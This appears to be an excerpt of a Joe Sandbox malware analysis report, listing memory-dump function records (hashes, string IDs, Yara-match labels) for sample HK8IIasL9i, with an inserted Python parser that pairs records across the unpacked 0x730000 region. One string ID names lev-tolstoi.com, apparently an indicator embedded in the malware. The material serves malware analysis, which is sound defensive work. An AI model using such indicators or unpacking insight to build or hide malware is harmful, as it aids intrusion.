                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: +|-~$/pqr$_
                                                                                                                                                                                                                                                        • API String ID: 0-1379640984
                                                                                                                                                                                                                                                        • Opcode ID: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
                                                                                                                                                                                                                                                        • Instruction ID: 042a524babaaaf1240c13a88dd3a117b8cd22f0ed9ec4b151ea40a3d869026f8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D9810A5561495006DB2CDF3489A333BAAD79F84308B2991BFC995CFBABE93CC502874D
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: +|-~$/pqr$_
                                                                                                                                                                                                                                                        • API String ID: 0-1379640984
                                                                                                                                                                                                                                                        • Opcode ID: 6cec998220da979fd4d7e4802d464de526f10a737984141f1598214dad803a78
                                                                                                                                                                                                                                                        • Instruction ID: ef815690421230d978b5567e448b5e7a71f91f0ebb5a0f0f34302f64b4d36d8c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6cec998220da979fd4d7e4802d464de526f10a737984141f1598214dad803a78
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3812C5160569005EB2CDF3888A773BB9D69F84308F2991BEC955CFA67E93CC502874E
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                        • API String ID: 0-2784972518
                                                                                                                                                                                                                                                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                        • Instruction ID: 79c13e3853801c87cfbe3228b3cf0cd0e59d880e24c31692bd3642d34f4b62b4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C0314DB6910609DFEB10CF99C884BADBBF9FF48324F15404AD441A7312D775EA45CBA4
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: "51s$9YB
                                                                                                                                                                                                                                                        • API String ID: 0-2722061943
                                                                                                                                                                                                                                                        • Opcode ID: 211a046e9116838b58fef2f862f3bc43e5d0a454b8724f73db8adee7e8caa559
                                                                                                                                                                                                                                                        • Instruction ID: 779a5c1bb40158b59da43047085edf677e041d4ba635d65d9609cd33f89ab022
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 211a046e9116838b58fef2f862f3bc43e5d0a454b8724f73db8adee7e8caa559
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE321976B00622CBCB24CF68D8516BFB3B2FF89310B99856DD442AB364DB395D41CB54
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: !@$,
                                                                                                                                                                                                                                                        • API String ID: 0-2321553346
                                                                                                                                                                                                                                                        • Opcode ID: 00a3d0f56e47fa8dbf69d309b3c8ad0eabeffacace6d1066a3ad4a95fdf331ff
                                                                                                                                                                                                                                                        • Instruction ID: 02546279eb0c4d83f3c4e3be5ab3571bc15c22c1dfd1b9922496e5385efd982e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 00a3d0f56e47fa8dbf69d309b3c8ad0eabeffacace6d1066a3ad4a95fdf331ff
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB4259B1E042648FDB04CF78D8813AEBFF1AF55310F59826ED895A7391C3798846CB86
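The records above list the same function twice for several API String IDs: once in the on-disk image dump (Offset 00400000, based on PE: true) and once in the region at 00730000 (based on PE: false, the dump that carries the Yara matches section). Pairing records across dumps by API String ID is how an analyst confirms that the 0x730000 region holds a copy of the same code rather than unrelated memory. The parser below is an added example, not part of the Joe Sandbox report or its tooling; its input is a constructed subset of the records shown on this page, with indentation removed, and the nibble-agreement score on the Instruction Fuzzy Hash is an assumed crude comparison, not Joe Sandbox's own similarity metric.

```python
"""Pair Joe Sandbox function records across memory dumps by API String ID."""
import re
from collections import defaultdict

# Constructed input: three records transcribed from the report excerpt on this page.
REPORT_EXCERPT = """\
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID:
• String ID: Ef$TQ][$sWK)
• API String ID: 0-3401374238
• Opcode ID: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
• Instruction ID: 19a0c778187f2748ae17dd07c5e08606c1358576a23e797e2c0b4f31c76305c1
• Opcode Fuzzy Hash: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
• Instruction Fuzzy Hash: CBB1C33061C3E08ED7398F2994507ABBBE09F97304F48499DD4D95B382DB79850ACBA7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
Yara matches
Similarity
• API ID:
• String ID: Ef$TQ][$sWK)
• API String ID: 0-3401374238
• Opcode ID: 34b98bce0e098604bc8c30d8401df6549c9b0a7e4ea807236a6bc4bf95e6afdf
• Instruction ID: 9cbcb5ce71e577d69acf885f1bfd9260fbb84fbc9d6754ea0596745cf7322951
• Opcode Fuzzy Hash: 34b98bce0e098604bc8c30d8401df6549c9b0a7e4ea807236a6bc4bf95e6afdf
• Instruction Fuzzy Hash: 52B1043151D3D08ED7398F3994907ABBBE0AFA7305F04499CD4D95B282D779860ACB63
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
Yara matches
Similarity
• API ID:
• String ID: .$GetProcAddress.$l
• API String ID: 0-2784972518
• Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
• Instruction ID: 79c13e3853801c87cfbe3228b3cf0cd0e59d880e24c31692bd3642d34f4b62b4
• Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
• Instruction Fuzzy Hash: C0314DB6910609DFEB10CF99C884BADBBF9FF48324F15404AD441A7312D775EA45CBA4
"""

FIELD = re.compile(r"^• ([^:]+):\s*(.*)$")
SOURCE = re.compile(r"Offset: ([0-9A-Fa-f]+), based on PE: (true|false)")


def parse_records(text):
    """Split the excerpt into one dict per 'Memory Dump Source' record."""
    records, cur = [], None
    for line in text.splitlines():
        line = line.strip()
        if line == "Memory Dump Source":
            cur = {"yara_section": False}
            records.append(cur)
        elif cur is None:
            continue                      # ignore anything before the first record
        elif line == "Yara matches":
            cur["yara_section"] = True    # label present only for the 0x730000 dump in this excerpt
        elif (m := FIELD.match(line)):
            key, val = m.group(1), m.group(2)
            cur[key] = val
            if key == "Source File":      # pull the base address and PE flag out of the dump name
                s = SOURCE.search(val)
                cur["offset"] = int(s.group(1), 16)
                cur["based_on_pe"] = s.group(2) == "true"
    return records


def nibble_agreement(h1, h2):
    """Fraction of hex positions at which two equal-length fuzzy hashes agree (assumed crude metric)."""
    if len(h1) != len(h2):
        raise ValueError("fuzzy hashes differ in length")
    return sum(a == b for a, b in zip(h1, h2)) / len(h1)


def cross_region_report(text):
    """Per API String ID: which dumps it appears in, and how alike the paired instruction hashes are."""
    groups = defaultdict(list)
    for r in parse_records(text):
        groups[r.get("API String ID", "")].append(r)
    report = {}
    for sid, recs in groups.items():
        entry = {
            "strings": recs[0]["String ID"],
            "regions": sorted({r["offset"] for r in recs}),
            "in_on_disk_image": any(r["based_on_pe"] for r in recs),
            "in_unpacked_region": any(not r["based_on_pe"] for r in recs),
            "yara_section": any(r["yara_section"] for r in recs),
        }
        if len(recs) == 2:                # same function seen in both dumps: compare the instruction hashes
            entry["instr_hash_agreement"] = nibble_agreement(
                recs[0]["Instruction Fuzzy Hash"], recs[1]["Instruction Fuzzy Hash"])
        report[sid] = entry
    return report


if __name__ == "__main__":
    for sid, e in cross_region_report(REPORT_EXCERPT).items():
        print(sid, [hex(o) for o in e["regions"]], e.get("instr_hash_agreement"))
```

For the pair sharing API String ID 0-3401374238 the Instruction Fuzzy Hashes agree at 49 of 70 hex positions while the Opcode IDs differ entirely, which is consistent with the same function being present in both dumps with relocation-dependent bytes changed. A record that appears only under 0x730000, such as the one referencing GetProcAddress, is the kind of function to inspect first when looking for code that exists only after unpacking.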
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
Yara matches
Similarity
• API ID:
• String ID: !@$,
• API String ID: 0-2321553346
• Opcode ID: 53d5da5660c4a43f8d0f64280c8733e9bdccf6cbe85e2db49c8b0f6515059a90
                                                                                                                                                                                                                                                        • Instruction ID: 1409ff1c89eec9639fa30a517ddd8d1c7b53f6d556d7cdf5191d0e738cae31b4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 53d5da5660c4a43f8d0f64280c8733e9bdccf6cbe85e2db49c8b0f6515059a90
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F4217B1E042448FDB04CF78C8853EEBFF1AF46311F198269D895A7392D779894ACB52
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: Dx$lev-tolstoi.com
                                                                                                                                                                                                                                                        • API String ID: 0-818776348
                                                                                                                                                                                                                                                        • Opcode ID: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                                                                                                                                                                                                        • Instruction ID: 5bb1130f72a98c6f233d2c217a903bc57bb56de3339a3108bfc93ec34e4a158e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1F1CDB054C3D18ED335CF6594907EBBBE0EB92314F144AAEC8D96B382C735090A8B97
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: Dx$lev-tolstoi.com
                                                                                                                                                                                                                                                        • API String ID: 0-818776348
                                                                                                                                                                                                                                                        • Opcode ID: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                                                                                                                                                                                                        • Instruction ID: 5e79cb6a72c2493b070d6648864c3f7eaf829ac9fe49937b0c7855b38eb6f48e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2EF1DDB054D3D18EE335CF659490BEBBFE1AB92314F184AADC8D95B642C735090ACB93
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 0K)$4*VP
                                                                                                                                                                                                                                                        • API String ID: 0-3626284114
                                                                                                                                                                                                                                                        • Opcode ID: 958d662d80f610fa8de2bec6fdd7d8beff1fa42db32f20cab0fd5fd8684a20d5
                                                                                                                                                                                                                                                        • Instruction ID: 9876424f4d1e1a24ea825129a784b44ad5c7c6f9f7859c65ec0973722cd958ea
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 958d662d80f610fa8de2bec6fdd7d8beff1fa42db32f20cab0fd5fd8684a20d5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AED13A3151C3D08ED7358B3984507EBBBE19FA3315F18896DD8D98B382C7B9890AC752
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 0K)$4*VP
                                                                                                                                                                                                                                                        • API String ID: 0-3626284114
                                                                                                                                                                                                                                                        • Opcode ID: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
                                                                                                                                                                                                                                                        • Instruction ID: 79d6e082e0491a4045e5b840a95bb4df230d34c241beba690eb3c8ed7007ce5a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8FD12730A1C3D08ED7258F3994507ABBFE19FA7314F59896ED4C98B382C7798406CB66
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: R2B$6B
                                                                                                                                                                                                                                                        • API String ID: 0-20043878
                                                                                                                                                                                                                                                        • Opcode ID: ac58904699f18f78ac368c51fcd47e09c00d21abb36880cf37e6842ead4d4e32
                                                                                                                                                                                                                                                        • Instruction ID: f5db2046e1d380e536cc29ae1ea4695f6a7d49829660d0c0f3bd76f15908f1aa
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac58904699f18f78ac368c51fcd47e09c00d21abb36880cf37e6842ead4d4e32
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3AD1C276A01116CFDB18CF68DC917AE73B2FB8A311F1A85A9D841E7390DB34AD11CB58
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: XG$|}
                                                                                                                                                                                                                                                        • API String ID: 0-1014376750
                                                                                                                                                                                                                                                        • Opcode ID: e601669f8485cc3344b93b58b39bec23c35c7299807bf4f05dda551d1a5ff6f0
                                                                                                                                                                                                                                                        • Instruction ID: fef0f9a3622c059bd3dca30c9da84c32a684abbcbc54a65241ce9b590edefb0f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e601669f8485cc3344b93b58b39bec23c35c7299807bf4f05dda551d1a5ff6f0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ECD122B16083108BD724DF18D8927ABB7F2FFE5354F49891DE5868B3A1E7788801CB56
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
Similarity
• API ID:
• String ID: XG$|}
• API String ID: 0-1014376750
• Opcode ID: dab4d877ca047d4bef4a60ac035a74c1689232e455a040bcd58bfaed14168dbd
• Instruction ID: 9713a0049a972a71cfbc19781e9b361646419870219b5e5644bfda2243854fa6
• Opcode Fuzzy Hash: dab4d877ca047d4bef4a60ac035a74c1689232e455a040bcd58bfaed14168dbd
• Instruction Fuzzy Hash: 05D114B15083408BD724DF14C8927ABB7F1FFD2316F49895CE9968B3A1E7B98805CB52
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID:
• String ID: )$IEND
• API String ID: 0-707183367
• Opcode ID: a91b974ffb7970066f5ddd55fbf8d6bd18980178a5d0d12c0270eeeb14f23bc6
• Instruction ID: dbf6d47144c6b822b2acdb98883b9d528113f132bac91ec627b85730d464e823
• Opcode Fuzzy Hash: a91b974ffb7970066f5ddd55fbf8d6bd18980178a5d0d12c0270eeeb14f23bc6
• Instruction Fuzzy Hash: 34D1CEB15083449FE720CF14D84575FBBE4AB94308F14492EFA99AB3C2E779D908CB96
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
Yara matches
Similarity
• API ID:
• String ID: )$IEND
• API String ID: 0-707183367
• Opcode ID: e75c78a806b7862965fdc8e28a2ab248e9bd6dbcacf7bf91078409fb9652b6c0
• Instruction ID: 857b4c8065c9131f934eabf9d9323b6650cf8a7ed1b4aedb7b78b07f766962e1
• Opcode Fuzzy Hash: e75c78a806b7862965fdc8e28a2ab248e9bd6dbcacf7bf91078409fb9652b6c0
• Instruction Fuzzy Hash: 89D19EB1508344DFE724CF14C845B9BBBE4AF94304F14892DF9999B382D779E908CB92
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID: InitializeThunk
• String ID: i$r}A
• API String ID: 2994545307-2976846027
• Opcode ID: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
• Instruction ID: bf893d2c0726f4e317e2b51d5e32a95bc91f637e65c50f94937d3483e244f6d9
• Opcode Fuzzy Hash: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
• Instruction Fuzzy Hash: 4781A83694C351CFD710CF68D8806ABBBE2EBD2300F18496ED8D697252C7389985C7CA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID:
• String ID: d$d
• API String ID: 0-195624457
• Opcode ID: 5ae760aa5af7d138e0a7bd51aa20738c42f63bbe965dfb313ec005962f2f09c8
• Instruction ID: a6a5a8ac2d59b7de1a8b575b3a10bb681eff341670204cea3f60d1849e0cf04e
• Opcode Fuzzy Hash: 5ae760aa5af7d138e0a7bd51aa20738c42f63bbe965dfb313ec005962f2f09c8
• Instruction Fuzzy Hash: F1513A36908320CBC714CF24D85162BB7D2AB8A718F494A6DECC9A7351D7369D15CB8B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID:
• String ID: P<?$P<?
• API String ID: 0-3449142988
• Opcode ID: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
• Instruction ID: 58e7122ac3cea56caf2700395258951e32a9ff530ffc896d1714b79e34f88e6e
• Opcode Fuzzy Hash: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
• Instruction Fuzzy Hash: 64312976A44310EFD7208F54C880BBBB7A6F789300F58D92ED5C9A3251DB745C84879B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID: InitializeThunk
• String ID: f
• API String ID: 2994545307-1993550816
• Opcode ID: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
• Instruction ID: 18f220f42ed12d3f8706e230857eda4cfb4a422739cf4bd3cfbe98504a66e541
• Opcode Fuzzy Hash: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
• Instruction Fuzzy Hash: 8512D3706083418FD715CF28C88176FB7E5EB89314F289A2EE6E597392D734DC058B9A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID:
• String ID: bC
• API String ID: 0-3681614764
• Opcode ID: 81246caaa5fb78c3d38635f3ad354d87a7ab4eb57a3eaf3217e543b2d80e8b50
• Instruction ID: 871c5afb2dffc20ff0dbbcf53a0195aac73061a90b0e28cef4dba4d31fdaf636
• Opcode Fuzzy Hash: 81246caaa5fb78c3d38635f3ad354d87a7ab4eb57a3eaf3217e543b2d80e8b50
• Instruction Fuzzy Hash: 3712E23AA18215CFCB04CF28E8905AAB7B2FF8E311F1A847DD54697351D734A952CB88
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID:
• String ID: bC
• API String ID: 0-3681614764
• Opcode ID: c70fff483ec8e9077dfc10fa089d78eeba6ca480428d69a1677b3b3847d620ad
• Instruction ID: 5e30844967bebdc7bd1579877bde578fcf76ae60555b00215fe6639be0914efa
• Opcode Fuzzy Hash: c70fff483ec8e9077dfc10fa089d78eeba6ca480428d69a1677b3b3847d620ad
• Instruction Fuzzy Hash: 7DF1E436A28215CFCB04CF28E8905AAB7F2FF8E311F19847DD94697351D734A952CB88
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: bC
                                                                                                                                                                                                                                                        • API String ID: 0-3681614764
                                                                                                                                                                                                                                                        • Opcode ID: 1d8feeef0126ffe8c63342afaba4558ed33c57e7ba78c596c66c7e0fa34e77c1
                                                                                                                                                                                                                                                        • Instruction ID: 5e6aaad999615e2ac42fefb03cf1b536ced96fd12a8bf48793a25e995ad5db17
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d8feeef0126ffe8c63342afaba4558ed33c57e7ba78c596c66c7e0fa34e77c1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BAF1E536A28215CFCB04CF68E8905AAB7F2FF8E311F19847DD94697351D734A952CB88
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
